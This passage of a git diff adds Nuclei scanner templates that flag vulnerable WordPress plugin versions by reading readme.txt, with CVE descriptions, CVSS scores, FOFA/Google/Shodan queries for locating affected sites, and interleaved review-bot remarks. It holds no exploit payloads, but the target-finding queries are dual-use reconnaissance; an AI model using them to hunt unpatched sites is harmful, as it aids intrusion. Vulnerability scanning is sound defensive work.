+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.25.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11763-7c77355461cb32e1d2f805bce3503999.yaml b/poc/cve/CVE-2024-11763-7c77355461cb32e1d2f805bce3503999.yaml
new file mode 100644
index 0000000000..a9c097f0d9
--- /dev/null
+++ b/poc/cve/CVE-2024-11763-7c77355461cb32e1d2f805bce3503999.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11763-7c77355461cb32e1d2f805bce3503999
+
+info:
+ name: >
+ Plezi <= 1.0.6 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Plezi plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'plezi' shortcode in all versions up to, and including, 1.0.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/67768957-45be-48d9-ad5e-147290ef4cd5?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-11763
+ metadata:
+ fofa-query: "wp-content/plugins/plezi/"
+ google-query: inurl:"/wp-content/plugins/plezi/"
+ shodan-query: 'vuln:CVE-2024-11763'
+ tags: cve,wordpress,wp-plugin,plezi,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/plezi/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "plezi"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.6')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11776-8aa2f830d09b9ce0bf39fad8d531748b.yaml b/poc/cve/CVE-2024-11776-8aa2f830d09b9ce0bf39fad8d531748b.yaml
new file mode 100644
index 0000000000..f8c637fdd6
--- /dev/null
+++ b/poc/cve/CVE-2024-11776-8aa2f830d09b9ce0bf39fad8d531748b.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11776-8aa2f830d09b9ce0bf39fad8d531748b
+
+info:
+ name: >
+ PCRecruiter Extensions <= 1.4.22 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The PCRecruiter Extensions plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'PCRecruiter' shortcode in all versions up to, and including, 1.4.22 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/d97e1ec3-321b-4d69-ab69-e3ecab0937b3?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-11776
+ metadata:
+ fofa-query: "wp-content/plugins/pcrecruiter-extensions/"
+ google-query: inurl:"/wp-content/plugins/pcrecruiter-extensions/"
+ shodan-query: 'vuln:CVE-2024-11776'
+ tags: cve,wordpress,wp-plugin,pcrecruiter-extensions,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/pcrecruiter-extensions/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "pcrecruiter-extensions"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.4.22')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11808.yaml b/poc/cve/CVE-2024-11808.yaml
new file mode 100644
index 0000000000..b781f1af64
--- /dev/null
+++ b/poc/cve/CVE-2024-11808.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11808-e8f2f8bf443bbbf9f355079310951d95
+
+info:
+ name: >
+ Pingmeter Uptime Monitoring <= 1.0.3 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The Pingmeter Uptime Monitoring plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the '_wpnonce' parameter in all versions up to, and including, 1.0.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/7da41c7c-31c4-4e95-ac5a-25bd17e507b9?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-11808
+ metadata:
+ fofa-query: "wp-content/plugins/pingmeter-uptime-monitoring/"
+ google-query: inurl:"/wp-content/plugins/pingmeter-uptime-monitoring/"
+ shodan-query: 'vuln:CVE-2024-11808'
+ tags: cve,wordpress,wp-plugin,pingmeter-uptime-monitoring,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/pingmeter-uptime-monitoring/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "pingmeter-uptime-monitoring"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.3')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11811.yaml b/poc/cve/CVE-2024-11811.yaml
new file mode 100644
index 0000000000..6e73ff9ecd
--- /dev/null
+++ b/poc/cve/CVE-2024-11811.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11811-931cffef1fe7884e7e5c1bc5b3f11a46
+
+info:
+ name: >
+ Feedify – Web Push Notifications <= 2.4.2 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The Feedify – Web Push Notifications plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'platform', 'phone', 'email', and 'store_url' parameters. in all versions up to, and including, 2.4.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/7a5a33fd-ecc6-40bf-93a5-10ead1c4c1f5?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-11811
+ metadata:
+ fofa-query: "wp-content/plugins/push-notification-by-feedify/"
+ google-query: inurl:"/wp-content/plugins/push-notification-by-feedify/"
+ shodan-query: 'vuln:CVE-2024-11811'
+ tags: cve,wordpress,wp-plugin,push-notification-by-feedify,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/push-notification-by-feedify/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "push-notification-by-feedify"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.4.2')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11852-f4234a32245049244f37cd7740e74ea6.yaml b/poc/cve/CVE-2024-11852-f4234a32245049244f37cd7740e74ea6.yaml
new file mode 100644
index 0000000000..27a3619aed
--- /dev/null
+++ b/poc/cve/CVE-2024-11852-f4234a32245049244f37cd7740e74ea6.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11852-f4234a32245049244f37cd7740e74ea6
+
+info:
+ name: >
+ Element Pack Elementor Addons (Header Footer, Template Library, Dynamic Grid & Carousel, Remote Arrows) <= 5.10.12 - Missing Authorization
+ author: topscoder
+ severity: low
+ description: >
+ The Element Pack Elementor Addons (Header Footer, Template Library, Dynamic Grid, Carousel and Remote Arrows) plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the get_layouts() function in all versions up to, and including, 5.10.12. This makes it possible for authenticated attackers, with Subscriber-level access and above, to obtain a detailed listing of layout templates.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/d2d23e6f-d48f-4734-95f8-12bd58eb1c2f?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
+ cvss-score: 4.3
+ cve-id: CVE-2024-11852
+ metadata:
+ fofa-query: "wp-content/plugins/bdthemes-element-pack-lite/"
+ google-query: inurl:"/wp-content/plugins/bdthemes-element-pack-lite/"
+ shodan-query: 'vuln:CVE-2024-11852'
+ tags: cve,wordpress,wp-plugin,bdthemes-element-pack-lite,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/bdthemes-element-pack-lite/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "bdthemes-element-pack-lite"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 5.10.12')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11889-abab61b0537d4711fbf17b6aaa4ee44b.yaml b/poc/cve/CVE-2024-11889-abab61b0537d4711fbf17b6aaa4ee44b.yaml
new file mode 100644
index 0000000000..25f3b171cf
--- /dev/null
+++ b/poc/cve/CVE-2024-11889-abab61b0537d4711fbf17b6aaa4ee44b.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11889-abab61b0537d4711fbf17b6aaa4ee44b
+
+info:
+ name: >
+ My IDX Home Search <= 2.1.1 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The My IDX Home Search plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'homeasap-idx-search' shortcode in all versions up to, and including, 2.1.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/172b6b54-d1de-48f9-ad2f-00d62d7e91fd?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-11889
+ metadata:
+ fofa-query: "wp-content/plugins/my-idx-home-search/"
+ google-query: inurl:"/wp-content/plugins/my-idx-home-search/"
+ shodan-query: 'vuln:CVE-2024-11889'
+ tags: cve,wordpress,wp-plugin,my-idx-home-search,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/my-idx-home-search/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "my-idx-home-search"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.1.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11897-1fb1c29d5a055c1052a1cda023eec838.yaml b/poc/cve/CVE-2024-11897-1fb1c29d5a055c1052a1cda023eec838.yaml
new file mode 100644
index 0000000000..8be7ea258b
--- /dev/null
+++ b/poc/cve/CVE-2024-11897-1fb1c29d5a055c1052a1cda023eec838.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11897-1fb1c29d5a055c1052a1cda023eec838
+
+info:
+ name: >
+ Contact Form, Survey & Form Builder – MightyForms <= 1.3.9 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Contact Form, Survey & Form Builder – MightyForms plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'mightyforms' shortcode in all versions up to, and including, 1.3.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/c691e469-3bd2-415d-8feb-9ae94aeaf339?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-11897
+ metadata:
+ fofa-query: "wp-content/plugins/mightyforms/"
+ google-query: inurl:"/wp-content/plugins/mightyforms/"
+ shodan-query: 'vuln:CVE-2024-11897'
+ tags: cve,wordpress,wp-plugin,mightyforms,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/mightyforms/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "mightyforms"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.3.9')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11938.yaml b/poc/cve/CVE-2024-11938.yaml
new file mode 100644
index 0000000000..8d1c86e127
--- /dev/null
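Review bot: The file is written without a terminating newline (`\ No newline at end of file` after the `compare_versions` line), and every other template added in this chunk ends the same way; YAML files conventionally end with exactly one newline, and yamllint's `new-line-at-end-of-file` rule reports the omission. These templates appear to come from a single generator, so emitting the final newline there would fix all of them at once.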
+++ b/poc/cve/CVE-2024-11938.yaml 
@@ -0,0 +1,59 @@
+id: CVE-2024-11938-a897d23a992f88a13f8a92c28cfec734
+
+info:
+ name: >
+ One Click Upsell Funnel for WooCommerce <= 3.4.9 - Authenticated (Contributor+) Stored Cross-Site Scripting via wps_wocuf_pro_yes Shortcode
+ author: topscoder
+ severity: low
+ description: >
+ The One Click Upsell Funnel for WooCommerce – Funnel Builder for WordPress, Create WooCommerce Upsell, Post-Purchase Upsell & Cross Sell Offers that Boost Sales & Increase Profits with Sales Funnel Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's wps_wocuf_pro_yes shortcode in all versions up to, and including, 3.4.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/4c10d6cb-e0a7-4b8d-b50f-e23885355872?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-11938
+ metadata:
+ fofa-query: "wp-content/plugins/woo-one-click-upsell-funnel/"
+ google-query: inurl:"/wp-content/plugins/woo-one-click-upsell-funnel/"
+ shodan-query: 'vuln:CVE-2024-11938'
+ tags: cve,wordpress,wp-plugin,woo-one-click-upsell-funnel,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/woo-one-click-upsell-funnel/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "woo-one-click-upsell-funnel"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.4.9')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11975.yaml b/poc/cve/CVE-2024-11975.yaml
new file mode 100644
index 0000000000..a434940a2e
--- /dev/null
+++ b/poc/cve/CVE-2024-11975.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11975-05a237ca7357ff8d76d54d31a44bc202
+
+info:
+ name: >
+ Reactflow Visitor Recording and Heatmaps <= 1.0.10 - Cross-Site Request Forgery to Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The Reactflow Visitor Recording and Heatmaps plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.10. This is due to missing or incorrect nonce validation affecting the _wpnonce parameter. This makes it possible for unauthenticated attackers to inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/eb360c56-e144-4dc5-8bfb-715a014cb8e6?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-11975
+ metadata:
+ fofa-query: "wp-content/plugins/reactflow-session-replay-heatmap/"
+ google-query: inurl:"/wp-content/plugins/reactflow-session-replay-heatmap/"
+ shodan-query: 'vuln:CVE-2024-11975'
+ tags: cve,wordpress,wp-plugin,reactflow-session-replay-heatmap,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/reactflow-session-replay-heatmap/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "reactflow-session-replay-heatmap"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.10')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11977.yaml b/poc/cve/CVE-2024-11977.yaml
new file mode 100644
index 0000000000..c3b33c2b03
--- /dev/null
+++ b/poc/cve/CVE-2024-11977.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11977-0110488fb1a5f556982113b515b4f15e
+
+info:
+ name: >
+ kk Star Ratings – Rate Post & Collect User Feedbacks <= 5.4.10 - Unauthenticated Arbitrary Shortcode Execution
+ author: topscoder
+ severity: high
+ description: >
+ The The kk Star Ratings – Rate Post & Collect User Feedbacks plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 5.4.10. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/5dea49fb-2703-4754-9abd-5f4e526d5570?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
+ cvss-score: 7.3
+ cve-id: CVE-2024-11977
+ metadata:
+ fofa-query: "wp-content/plugins/kk-star-ratings/"
+ google-query: inurl:"/wp-content/plugins/kk-star-ratings/"
+ shodan-query: 'vuln:CVE-2024-11977'
+ tags: cve,wordpress,wp-plugin,kk-star-ratings,high
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/kk-star-ratings/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "kk-star-ratings"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 5.4.10')
\ No newline at end of file
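Review bot: The description opens with `The The kk Star Ratings – Rate Post & Collect User Feedbacks plugin`, a duplicated article; it should read `The kk Star Ratings – Rate Post & Collect User Feedbacks plugin for WordPress is vulnerable to arbitrary shortcode execution …`. This text is printed verbatim in nuclei output, so the typo surfaces in every report that includes this finding.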
diff --git a/poc/cve/CVE-2024-12066.yaml b/poc/cve/CVE-2024-12066.yaml
new file mode 100644
index 0000000000..1c7f1528a0
--- /dev/null
+++ b/poc/cve/CVE-2024-12066.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-12066-a769524de5fd8cbd0b99e8393122048b
+
+info:
+ name: >
+ SMSA Shipping(official) <= 2.2 - Authenticated (Subscriber+) Arbitrary File Deletion
+ author: topscoder
+ severity: low
+ description: >
+ The SMSA Shipping(official) plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the smsa_delete_label() function in all versions up to, and including, 2.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php).
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/29d72347-ba49-45c6-a964-2c75064ac866?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.8
+ cve-id: CVE-2024-12066
+ metadata:
+ fofa-query: "wp-content/plugins/smsa-shipping-official/"
+ google-query: inurl:"/wp-content/plugins/smsa-shipping-official/"
+ shodan-query: 'vuln:CVE-2024-12066'
+ tags: cve,wordpress,wp-plugin,smsa-shipping-official,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/smsa-shipping-official/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "smsa-shipping-official"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.2')
\ No newline at end of file
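Review bot: The `word` matcher only passes when the directory slug `smsa-shipping-official` appears literally in the readme.txt body, yet the request path already selects that directory, and a WordPress plugin readme need not repeat its directory name anywhere in its text (it normally carries the display name, here `SMSA Shipping(official)`); if the slug is absent from the readme, `matchers-condition: and` makes the template silently never match even on a vulnerable install. Verify against the actual readme and, if the slug is not in it, match on a string the readme is known to contain, e.g. `- "=== SMSA Shipping"`, or on the `Stable tag:` line the extractor already relies on. Every other template in this chunk uses the same slug-in-readme pattern and deserves the same check.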
diff --git a/poc/cve/CVE-2024-12262.yaml b/poc/cve/CVE-2024-12262.yaml
new file mode 100644
index 0000000000..c4c78aa1d9
--- /dev/null
+++ b/poc/cve/CVE-2024-12262.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-12262-44dd458108e38e1a10ff93aa59a1bca6
+
+info:
+ name: >
+ Ebook Store <= 5.8001 - Reflected Cross-Site Scripting via 'step'
+ author: topscoder
+ severity: medium
+ description: >
+ The Ebook Store plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'step' parameter in all versions up to, and including, 5.8001 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/5f8a13e3-f6f5-4673-b223-95eb11465756?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-12262
+ metadata:
+ fofa-query: "wp-content/plugins/ebook-store/"
+ google-query: inurl:"/wp-content/plugins/ebook-store/"
+ shodan-query: 'vuln:CVE-2024-12262'
+ tags: cve,wordpress,wp-plugin,ebook-store,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/ebook-store/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "ebook-store"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 5.8001')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-12338-7049005d472255be06aaa45a94022e7a.yaml b/poc/cve/CVE-2024-12338-7049005d472255be06aaa45a94022e7a.yaml
new file mode 100644
index 0000000000..207a13ef26
--- /dev/null
+++ b/poc/cve/CVE-2024-12338-7049005d472255be06aaa45a94022e7a.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-12338-7049005d472255be06aaa45a94022e7a
+
+info:
+ name: >
+ Website Toolbox Community <= 2.0.1 - Reflected Cross-Site Scripting via websitetoolbox_username
+ author: topscoder
+ severity: medium
+ description: >
+ The Website Toolbox Community plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘websitetoolbox_username’ parameter in all versions up to, and including, 2.0.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/eae14ac7-ebc1-45a1-b0dd-fec2bbb14460?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-12338
+ metadata:
+ fofa-query: "wp-content/plugins/website-toolbox-forums/"
+ google-query: inurl:"/wp-content/plugins/website-toolbox-forums/"
+ shodan-query: 'vuln:CVE-2024-12338'
+ tags: cve,wordpress,wp-plugin,website-toolbox-forums,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/website-toolbox-forums/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "website-toolbox-forums"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.0.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-12408.yaml b/poc/cve/CVE-2024-12408.yaml
new file mode 100644
index 0000000000..a00b512bb9
--- /dev/null
+++ b/poc/cve/CVE-2024-12408.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-12408-260120a293bed72f17136733a5d35a68
+
+info:
+ name: >
+ WP on AWS <= 5.2.1 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
